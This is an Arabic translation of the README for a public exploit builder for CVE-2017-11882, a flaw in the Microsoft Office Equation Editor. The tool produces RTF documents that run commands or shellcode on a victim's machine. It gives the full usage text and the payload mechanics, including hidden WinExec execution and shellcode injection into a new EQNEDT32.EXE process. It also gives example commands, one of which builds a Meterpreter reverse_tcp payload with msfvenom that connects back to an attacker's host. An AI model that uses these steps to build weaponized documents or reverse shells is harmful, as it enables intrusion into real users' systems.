
CVE-2017-11882 Exploit يقبل أمرًا/كودًا يزيد طوله عن 17 ألف بايت كحد أقصى.
يستطيع استغلال CVE-2017-11882 قبول أوامر/أكواد يصل طولها إلى أكثر من 17 كيلوبايت كحد أقصى.
لتنفيذ الأوامر عن بُعد، يقوم هذا الاستغلال باستدعاء WinExec مع SW_HIDE ثم استدعاء ExitProcess بعد عودة WinExec.
لتنفيذ الكود عن بُعد، يقفز هذا الاستغلال مباشرة إلى الكود.
لا يمكنني العثور على مرجع لبنية الكائن... لذا لا يمكنني تغيير طول الملف لتنفيذ كود بطول تعسفي..:(
لكني أعتقد أن 17 كيلوبايت كافية حقًا. سيكتشف سكربت بايثون حجم الحمولة الذي تحتاجه ويختار قالب الحمولة الصحيح.
تحذير: تنفيذ الكود عن بُعد (RCE) سيعلّق عملية Winword إذا لم تقم بالترحيل إلى عملية أخرى!
حاليًا يقوم هذا الاستغلال بحقن الشيل كود الخاص بك في عملية EQNEDT32.EXE جديدة إذا حددت العلم -i. هذه العملية مريبة لأدوات مكافحة الفيروسات لكنها لن تعلّق عملية Word.
usage: CVE-2017-11882.py [-h] -c CMD [-t {0,1}] [-i INJECT] -o OUTPUT
Exploit for CVE-2017-11882 @unamer(https://github.com/unamer/CVE-2017-11882)
optional arguments:
-h, --help show this help message and exit
-c CMD, --cmd CMD Command or shellcode file to run in target system
(Must be shorter than 17967 bytes!!)
-t {0,1}, --type {0,1}
Type (0:shellcode 1:command, default=1)
-i INJECT, --inject INJECT
Inject shellcode to new process
-o OUTPUT, --output OUTPUT
Output exploit rtf
مثال:
لتنفيذ الأوامر عن بُعد
CVE-2017-11882.py -c cmd.exe -o test.rtf
لتنفيذ الكود عن بُعد
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.115 LPORT=2333 -o ./sc.bin
CVE-2017-11882.py -c sc.bin -t 0 -i 1 -o test.rtf
عيّن قيمة مصحح الأخطاء إلى مسار مصحح الأخطاء في HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\EQNEDT32.EXE
قم ببناء استغلال وتشغيله.
عيّن نقطة توقف عند 0x41165f
سيتم الوصول إلى نقطة التوقف هذه مرتين، وفي المرة الثانية سيتم تنفيذ الحمولة بعد عودة هذه الدالة.